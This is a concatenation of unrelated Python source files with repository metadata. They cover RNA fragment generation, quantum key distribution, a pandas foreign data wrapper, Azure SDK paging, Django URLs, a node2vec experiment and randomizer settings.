Generate the fragments with 2 missed cleavages
"""
output_list = []
for x, y, z in zip(input_list, input_list[1:], input_list[2:]):
if len(z.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}"))
output_list.append(
"{} {}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], x.split()[2],
z.split()[3], miss))
return input_list + output_list
def miss_3(input_list):
"""
Generate the fragments with 3 missed cleavages
"""
output_list = []
for x, y, z, w in zip(input_list, input_list[1:], input_list[2:], input_list[3:]):
if len(w.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}{w.split()[1]}"))
output_list.append(
"{} {}{}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], w.split()[1],
x.split()[2], w.split()[3], miss))
return input_list + output_list
def miss_4(input_list):
"""
Generate the fragments with 4 missed cleavages
"""
output_list = []
for x, y, z, w, v in zip(input_list, input_list[1:], input_list[2:], input_list[3:], input_list[4:]):
if len(v.split()) == 6:
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}{z.split()[1]}{w.split()[1]}"
f"{v.split()[1]}"))
output_list.append(
"{} {}{}{}{}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], z.split()[1], w.split()[1],
v.split()[1], x.split()[2], v.split()[3], miss))
return input_list + output_list
def clean_lines(input_list):
output_list = []
for line in input_list:
output_list.append(' '.join(line.split()[:5]))
return output_list
def nonspecific(rna_id, sequence, min_length, max_length):
"""
    Compute all the fragment sequences in the case of nonspecific cleavage, based on the minimum and
    maximum fragment lengths selected by the user
"""
output_sequences, seq_list = [], list(sequence)
for i in range(min_length, max_length + 1):
if i <= len(sequence):
for position in range(0, len(sequence) - i + 1):
seq_to_add = ''.join(seq_list[position:position + i])
output_sequences.append(
"{} {} {} {} {}\n".format(rna_id, seq_to_add, position + 1, position + i, 0))
return output_sequences
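# Editor's sketch: nonspecific('seq1', 'GGAUC', 3, 4) enumerates every substring of length 3 and 4,
# yielding GGA (1-3), GAU (2-4), AUC (3-5), GGAU (1-4) and GAUC (2-5), all with 0 missed cleavages.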
def generate_output():
"""
Final output file generation with lines in the format:
molecule sequence residue_start residue_end miss 5'end 3'end
"""
final_lines, seq_output, unique_ids = [], [], []
sequences_dictionary = {}
# Loop through the fasta files given as input extracting the sequences
for fasta_file in args.RNA_sequences:
if fasta_file[0].isdigit() or fasta_file[0].isalpha():
with open(os.getcwd() + "/" + fasta_file.rstrip(), 'r') as handle:
# Extract and process the input fasta sequences
for seq in SeqIO.parse(handle, "fasta"):
if seq.id in unique_ids:
print(
"ERROR!! The molecule id {} is used to identify multiple molecules. Please edit the "
"molecules id in the fasta file to be uniques. Execution terminated without output".format(
seq.id))
sys.exit(1)
else:
unique_ids.append(seq.id)
sequence = str(seq.seq.ungap("-"))
sequences_dictionary[str(seq.id)] = sequence
seq_output.append(str(seq.id) + " " + sequence + "\n")
# Append the nonspecific cleavage lines
if args.enzyme == 'nonspecific':
final_lines = final_lines + nonspecific(str(seq.id), sequence, args.nonspecific_min_length,
args.nonspecific_max_length)
# Append the missed cleavages lines based on the selected values
else:
if args.miss == 0:
final_lines = final_lines + clean_lines(print_ReSites(str(seq.id), sequence,
args.enzyme))
elif args.miss == 1:
final_lines = final_lines + clean_lines(miss_1(
print_ReSites(str(seq.id), sequence, args.enzyme)))
elif args.miss == 2:
final_lines = final_lines + clean_lines(miss_2(
miss_1(print_ReSites(str(seq.id), sequence, args.enzyme))))
elif args.miss == 3:
final_lines = final_lines + clean_lines(miss_3(
miss_2(miss_1(print_ReSites(str(seq.id), sequence, args.enzyme)))))
elif args.miss == 4:
final_lines = final_lines + clean_lines(miss_4(miss_3(
miss_2(miss_1(print_ReSites(str(seq.id), sequence, args.enzyme))))))
open(os.getcwd() + "/seq_output", 'w').writelines(seq_output)
# Add the information about 3' and 5' chemistry to the cleaved fragments
output_lines = []
for line in final_lines:
output_lines.extend(assign_chemistry(line, sequences_dictionary))
return output_lines
def assign_chemistry(fragment, sequences):
"""
    Assign the 3' and 5' chemistry to the cleaved fragments based on the user-specified options
"""
values = fragment.split()
outlines = []
# Add the 5' and 3' chemistry for the starting and ending nucleotides of each RNA sequence
if values[2] == '1':
for end5 in args.RNA_5end_chem:
if int(values[3]) == len(sequences[values[0]]):
for end3 in args.RNA_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
else:
for end3 in args.cleaved_fragments_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
# Add the chemistry info for all the other sequences
else:
for end5 in args.cleaved_fragments_5end_chem:
if int(values[3]) == len(sequences[values[0]]):
for end3 in args.RNA_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
else:
for end3 in args.cleaved_fragments_3end_chem:
outlines.append("{} {} {}\n".format(fragment.rstrip(), end5, end3))
return outlines
if __name__ == "__main__":
"""
Generate the output file output.1
"""
cleavages = ''
if args.enzyme == 'custom':
if not args.custom_enzyme:
print(
"ERROR!! Select an input file with the custom cleaving sites")
sys.exit(1)
else:
cleavages = f"#CLEAVING_SITES {','.join(read_custom_enzyme(args.custom_enzyme))}\n"
    # The header info differs based on the choice of nonspecific or specific cleavage
if args.enzyme == 'nonspecific':
starting_lines = ["#INPUT_SEQUENCE {}\n#ENZYME {}\n#NONSPECIFIC_MIN_LENGTH {}\n#NONSPECIFIC_MAX_LENGTH {}"
"\n#CLEAVED_RNA_5'CHEMISTRY"
" {}\n#CLEAVED_RNA_3'CHEMISTRY {}\n#RNA_5'CHEMISTRY {}\n#RNA_3'CHEMISTRY "
"{}\n"
"molecule sequence residue_start residue_end miss 5'end 3'end\n".format(os.path.basename(
args.RNA_sequences[0]),
args.enzyme,
args.nonspecific_min_length,
args.nonspecific_max_length,
','.join(
args.cleaved_fragments_5end_chem),
','.join(
args.cleaved_fragments_3end_chem),
','.join(
args.RNA_5end_chem),
','.join(
args.RNA_3end_chem))]
else:
starting_lines = ["#INPUT_SEQUENCE {}\n"
"#ENZYME {}\n#MISSED_CLEAVAGES {}\n#CLEAVED_RNA_5'CHEMISTRY {}\n"
"#CLEAVED_RNA_3'CHEMISTRY {}\n#RNA_5'CHEMISTRY {}\n#RNA_3'CHEMISTRY {}\n"
"{}"
"molecule sequence residue_start residue_end miss 5'end 3'end\n".format(os.path.basename(
args.RNA_sequences[0]),
args.enzyme,
args.miss,
','.join(
args.cleaved_fragments_5end_chem),
','.join(
args.cleaved_fragments_3end_chem),
','.join(
args.RNA_5end_chem),
','.join(
args.RNA_3end_chem),
cleavages)]
open(os.getcwd() + "/output.1", 'w').writelines(starting_lines + list(set(generate_output())))
print("Done! Output file(s) -> output.1 seq_output")
| 47.241685
| 120
| 0.543837
|
a3f9ff9430b357d27a0d3ac3700f1b6af25cdea9
| 3,343
|
py
|
Python
|
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
] | null | null | null |
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
] | null | null | null |
QNetwork/qkd/qkd.py
|
SwamyDev/q_network
|
4f1866f8d06e4f206b4ada5e86396a4da26f28f7
|
[
"MIT"
] | 2
|
2019-12-04T08:47:40.000Z
|
2021-07-22T16:22:27.000Z
|
import operator
import random
from abc import ABC, abstractmethod
import math
class QKDNode(ABC):
def __init__(self, ca_channel, error):
self.ca_channel = ca_channel
self.error = error
self.maximize_key_bits = False
self._qstates = []
self._other_bases = []
self._test_set = set()
self._mismatching_states = 0
def try_generate_key(self):
"""
        Performs a quantum key distribution protocol to try to generate a shared key between sender and receiver
        :return: An empty list [] if the protocol was unsuccessful (due to eavesdropping or noise), or
        an integer list (e.g. [0, 1, 1]) representing the shared key
"""
self.share_q_states()
if self.should_abort():
return []
return self.generate_key()
@abstractmethod
def share_q_states(self):
pass
@abstractmethod
def should_abort(self):
pass
@abstractmethod
def generate_key(self):
pass
def _send_q_states(self, amount):
self.ca_channel.send(amount)
def _share_bases(self):
self._send_bases()
self._receive_bases()
def _send_bases(self):
self.ca_channel.send([q.basis for q in self._qstates])
def _send_test_set(self):
s = len(self._qstates)
t = s // 2
self._test_set = set(random.sample(range(0, s), t))
self.ca_channel.send(list(self._test_set))
def _send_seed(self):
m = len(self._qstates) - len(self._test_set)
self._seed = self._gen_random_string(m)
self.ca_channel.send(self._seed)
def _send_ack(self):
self.ca_channel.send_ack()
def _receive_q_states(self):
amount = self.ca_channel.receive()[0]
self._measure_qstates(amount)
@abstractmethod
def _measure_qstates(self, amount):
pass
def _receive_bases(self):
self._other_bases = self.ca_channel.receive()
def _receive_seed(self):
self._seed = self.ca_channel.receive()
def _receive_test_set(self):
self._test_set = set(self.ca_channel.receive())
def _receive_ack(self):
self.ca_channel.receive_ack()
@staticmethod
def _gen_random_string(size, up_to=1):
return [random.randint(0, up_to) for _ in range(size)]
def _calculate_matching_error_of_values(self, lhs, rhs):
t = len(lhs)
self._mismatching_states = sum(a != b for a, b in zip(lhs, rhs))
return self._mismatching_states / t
def _calc_privacy_amplification_of(self, indices):
x = [self._qstates[i].value for i in indices]
k = len(x) - self._mismatching_states if self.maximize_key_bits else 1
return self._extract_key(x, self._seed, k)
@staticmethod
def _extract_key(x, seed, k):
chunk_size = math.floor(len(x) / k)
if chunk_size == 0:
raise ValueError("The requested key ({}) is too long for the raw key ({}).".format(k, len(x)))
return [sum(map(operator.mul, xp, sp)) % 2 for xp, sp in zip(QKDNode._split_list(x, chunk_size),
QKDNode._split_list(seed, chunk_size))]
@staticmethod
    def _split_list(lst, size):
        # Yield successive chunks of `lst` of at most `size` elements
        for i in range(0, len(lst), size):
            yield lst[i:i + size]
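    # Editor's sketch of the privacy-amplification step implemented by _extract_key: with raw key
    # x = [1, 0, 1, 1], seed = [1, 1, 0, 1] and k = 2, chunk_size is 2, so the chunk pairs
    # ([1, 0], [1, 1]) and ([1, 1], [0, 1]) are combined via inner products mod 2, giving the
    # shortened key [1, 1].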
| 29.848214
| 110
| 0.619503
|
08b79e1077b46c3c9746815ef84806a8346ad9ad
| 219
|
py
|
Python
|
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
python/high-scores/high_scores.py
|
willdjames/exercism-praticas
|
8de2fc82459c3f9e5eaff20bad4ce7a760ba786e
|
[
"MIT"
] | null | null | null |
def latest(scores):
    # The latest score is simply the last one recorded, not the last entry of the top three
    return scores[-1]
def personal_best(scores):
    # Highest score overall
    return max(scores)
def personal_top_three(scores):
    # Use sorted() so the caller's list is not reordered in place
    return sorted(scores, reverse=True)[:3]
| 18.25
| 41
| 0.73516
|
2cdfdc79a5e95061d2fea1d2f8d869a6769ed8dc
| 3,139
|
py
|
Python
|
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
python/multicorn/pandasfdw.py
|
jbylund/Multicorn
|
47ca7c875913445ed40e03804066de1b03892814
|
[
"PostgreSQL"
] | null | null | null |
import json
import pandas as pd
from multicorn import ForeignDataWrapper
df = pd.DataFrame({
"number": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
"parity": ["even", "odd", "even", "odd", "even", "odd", "even", "odd", "even", "odd"]
})
def fake_remote_pandas_endpoint(columns=None, aggs=None, group_clauses=None):
if group_clauses is not None:
return df.groupby(group_clauses, as_index=False).agg(aggs).to_dict('records')
if aggs is not None:
# Returns {"column_1": {"avg": x, "sum": y}, "column_2": {"min": z}, ..}
return df.agg(aggs).to_dict()
return df[columns].to_dict("records")
_PG_TO_PANDAS_FUNC_MAP = {
"min": "min",
"max": "max",
"sum": "sum",
"avg": "average",
"count": "count",
}
def _convert_aggs_arg(aggs):
# Convert aggs in accordance with Pandas API:
# {"column_1": ["avg", "sum"], "column_2": ["min"], ..}
pandas_aggs = {}
for agg_props in aggs.values():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
if agg_props["column"] not in pandas_aggs:
pandas_aggs[agg_props["column"]] = [function_name]
else:
pandas_aggs[agg_props["column"]].append(function_name)
return pandas_aggs
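# Editor's sketch (the Multicorn agg-name keys below are hypothetical): an input such as
#   {"sum.number": {"function": "sum", "column": "number"},
#    "min.number": {"function": "min", "column": "number"}}
# is converted to the Pandas-style mapping {"number": ["sum", "min"]}.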
class PandasFdw(ForeignDataWrapper):
def can_pushdown_upperrel(self):
return {
"groupby_supported": True,
"agg_functions": list(_PG_TO_PANDAS_FUNC_MAP)
}
def explain(self, quals, columns, aggs=None, group_clauses=None, verbose=False):
return [
f"quals: {quals}",
f"columns: {columns}",
f"aggs: {json.dumps(aggs, indent=4)}",
f"group_clauses: {group_clauses}"
]
def execute(self, quals, columns, aggs=None, group_clauses=None):
if group_clauses is not None:
pandas_aggs = _convert_aggs_arg(aggs)
for row in fake_remote_pandas_endpoint(columns, pandas_aggs, group_clauses):
# Convert result back to Multicorn API:
# {"column_1.avg": x, "column_1.sum": y, "column2": z, ...}
result = {}
for agg_name, agg_props in aggs.items():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
result[agg_name] = row[(agg_props["column"], function_name)]
for group_clause in group_clauses:
result[group_clause] = row[(group_clause, "")]
yield result
elif aggs is not None:
pandas_aggs = _convert_aggs_arg(aggs)
row = fake_remote_pandas_endpoint(columns, pandas_aggs)
# Convert result back to Multicorn API:
# {"column_1.avg": x, "column_1.sum": y, "column_2.min": z, ...}
result = {}
for agg_name, agg_props in aggs.items():
function_name = _PG_TO_PANDAS_FUNC_MAP[agg_props["function"]]
result[agg_name] = row[agg_props["column"]][function_name]
yield result
else:
for row in fake_remote_pandas_endpoint(columns):
yield row
return
| 35.269663
| 89
| 0.586811
|
08f667f696d50abad137529dcaa4beb274e5db9e
| 101
|
py
|
Python
|
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
tdfscrape-runner.py
|
bradsokol/tdf-scrape
|
87cc51eb3df3e953460e675b146ae1a5def36e38
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
from tdfscrape.tdfscrape import main
if __name__ == '__main__':
main()
| 12.625
| 36
| 0.683168
|
3b5840049dbc45b879e276f6012678236fe451d8
| 643
|
py
|
Python
|
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
core/bi/dictionaries/subscriberprofile.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------
# Subscriber Profile dictionary
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.clickhouse.dictionary import Dictionary
from noc.core.clickhouse.fields import StringField
class SubscriberProfile(Dictionary):
class Meta(object):
name = "subscriberprofile"
layout = "flat"
name = StringField()
    description = StringField()
glyph = StringField()
| 30.619048
| 72
| 0.479005
|
bf8eebcaefc930f871199f874ca7c15850f1a645
| 2,413
|
py
|
Python
|
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
qiskit_aqua/algorithms/components/optimizers/nlopts/crs.py
|
msoeken/aqua
|
af6a459621bcee90ed832a644ef9220644b84b03
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from qiskit_aqua.algorithms.components.optimizers import Optimizer
from ._nloptimizer import minimize
import logging
try:
import nlopt
except ImportError:
raise ImportWarning('nlopt cannot be imported')
logger = logging.getLogger(__name__)
class CRS(Optimizer):
"""Controlled Random Search (CRS) with local mutation
NLopt global optimizer, derivative-free
https://nlopt.readthedocs.io/en/latest/NLopt_Algorithms/#controlled-random-search-crs-with-local-mutation
"""
CRS_CONFIGURATION = {
'name': 'CRS',
'description': 'GN_CRS2_LM Optimizer',
'input_schema': {
'$schema': 'http://json-schema.org/schema#',
'id': 'crs_schema',
'type': 'object',
'properties': {
'max_evals': {
'type': 'integer',
'default': 1000
}
},
'additionalProperties': False
},
'support_level': {
'gradient': Optimizer.SupportLevel.ignored,
'bounds': Optimizer.SupportLevel.supported,
'initial_point': Optimizer.SupportLevel.required
},
'options': ['max_evals'],
'optimizer': ['global']
}
def __init__(self, configuration=None):
super().__init__(configuration or self.CRS_CONFIGURATION.copy())
def init_args(self):
pass
def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
return minimize(nlopt.GN_CRS2_LM, objective_function, variable_bounds, initial_point, **self._options)
| 32.608108
| 119
| 0.639039
|
c5045d6a3cba496ce6bca2e02606e1db070ca424
| 1,194
|
py
|
Python
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | 3
|
2019-01-29T15:08:47.000Z
|
2019-07-04T06:18:52.000Z
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | 5
|
2019-10-21T19:47:08.000Z
|
2021-06-10T21:32:39.000Z
|
21 _Software Testing Technology/suplerlists 2019.4.30/functional_tests.py
|
zhang99969/DailyLearning
|
949f94030d0b55c22bf65ba89001e0456c864c8c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 14:47:06 2019
@author: 最
"""
from selenium import webdriver
browser = webdriver.Chrome()
# Edith has heard about a cool new online to-do app. She goes
# to check out its homepage
browser.get('http://localhost:8000')
# She notices the page title and header mention to-do lists
assert 'To-Do' in browser.title, "Browser title was " + browser.title
# She is invited to enter a to-do item straight away
# She types "Buy peacock feathers" into a text box (Edith's hobby
# is tying fly-fishing lures)
# When she hits enter, the page updates, and now the page lists
# "1: Buy peacock feathers" as an item in a to-do list
# There is still a text box inviting her to add another item. She
# enters "Use peacock feathers to make a fly" (Edith is very methodical)
# The page updates again, and now shows both items on her list
# Edith wonders whether the site will remember her list. Then she sees
# that the site has generated a unique URL for her -- there is some
# explanatory text to that effect.
# She visits that URL - her to-do list is still there.
# Satisfied, she goes back to sleep
browser.quit()
| 31.421053
| 73
| 0.707705
|
2fcddd069e1e542f92bf5ce155f8059d19299802
| 806
|
py
|
Python
|
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
example/exampleproject/urls.py
|
terabitti/django-turbo-mixins
|
395710992b5c5704b1b0d3970838067987fe50cc
|
[
"MIT"
] | null | null | null |
"""exampleproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path("admin/", admin.site.urls),
path("", include("groceries.urls")),
]
| 35.043478
| 77
| 0.705955
|
1472bb7d8cdfead079fed5942a8f7342640d786e
| 1,197
|
py
|
Python
|
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
RecommenderSystem/exps/node2vec_exp.py
|
czx94/d2l
|
59eb899c157a772a2abe859e1aabdc5f103762dd
|
[
"MIT"
] | null | null | null |
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.getcwd())))
import argparse
import networkx
from utils import eval_embedding, vis_embedding, create_logger
from models import Node2Vec
from configs import cfg
def main():
parser = argparse.ArgumentParser("Node2vec training")
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
logger, log_path = create_logger(cfg)
logger.info(cfg)
graph = networkx.read_edgelist(cfg.DATA.GRAPH_PATH, create_using=networkx.DiGraph(), nodetype=None, data=[('weight', int)])
model = Node2Vec(graph, cfg, logger)
model.train()
embedding = model.get_embedding()
eval_embedding(embedding, cfg.DATA.LABEL_PATH, logger)
vis_embedding(embedding, cfg.DATA.LABEL_PATH, log_path)
if __name__ == '__main__':
main()
| 24.428571
| 127
| 0.680033
|
ace01d462613b9d6543b57f0e4f18b4d585fc27c
| 5,429
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2019-05-17T21:24:53.000Z
|
2020-02-12T11:13:42.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 15
|
2019-07-12T18:18:04.000Z
|
2019-07-25T20:55:51.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_11_01/aio/operations_async/_load_balancer_network_interfaces_operations_async.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerNetworkInterfacesOperations:
"""LoadBalancerNetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
load_balancer_name: str,
**kwargs
) -> AsyncIterable["models.NetworkInterfaceListResult"]:
"""Gets associated load balancer network interfaces.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_11_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/networkInterfaces'} # type: ignore
| 47.622807
| 192
| 0.668816
|
325a3ae514def1afb662bb20c513434b9d6a3203
| 13,973
|
py
|
Python
|
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | null | null | null |
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | 1
|
2020-05-28T01:23:09.000Z
|
2020-05-28T01:23:09.000Z
|
Settings.py
|
Andols0/OoT-Randomizer
|
3ffbc5d8f698cdaddaa2469b2c3beb82377fbc45
|
[
"MIT"
] | null | null | null |
import argparse
import textwrap
import string
import re
import hashlib
import math
import sys
import json
import logging
from version import __version__
from Utils import random_choices, local_path
from SettingsList import setting_infos, get_setting_info
from Plandomizer import Distribution
class ArgumentDefaultsHelpFormatter(argparse.RawTextHelpFormatter):
def _get_help_string(self, action):
return textwrap.dedent(action.help)
# 32 characters
letters = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
index_to_letter = { i: letters[i] for i in range(32) }
letter_to_index = { v: k for k, v in index_to_letter.items() }
def bit_string_to_text(bits):
# pad the bits array to be multiple of 5
if len(bits) % 5 > 0:
bits += [0] * (5 - len(bits) % 5)
# convert to characters
result = ""
for i in range(0, len(bits), 5):
chunk = bits[i:i + 5]
value = 0
for b in range(5):
value |= chunk[b] << b
result += index_to_letter[value]
return result
def text_to_bit_string(text):
bits = []
for c in text:
index = letter_to_index[c]
for b in range(5):
bits += [ (index >> b) & 1 ]
return bits
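# Editor's sketch of the round trip: bit_string_to_text([1, 0, 1]) pads the bits to [1, 0, 1, 0, 0]
# and encodes them as the single character 'F' (index 5 in the 32-letter alphabet above), while
# text_to_bit_string('F') returns [1, 0, 1, 0, 0]; the padding zeros are the only information lost.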
# holds the particular choices for a run's settings
class Settings:
def get_settings_display(self):
padding = 0
for setting in filter(lambda s: s.shared, setting_infos):
padding = max( len(setting.name), padding )
padding += 2
output = ''
for setting in filter(lambda s: s.shared, setting_infos):
name = setting.name + ': ' + ' ' * (padding - len(setting.name))
if setting.type == list:
val = ('\n' + (' ' * (padding + 2))).join(self.__dict__[setting.name])
else:
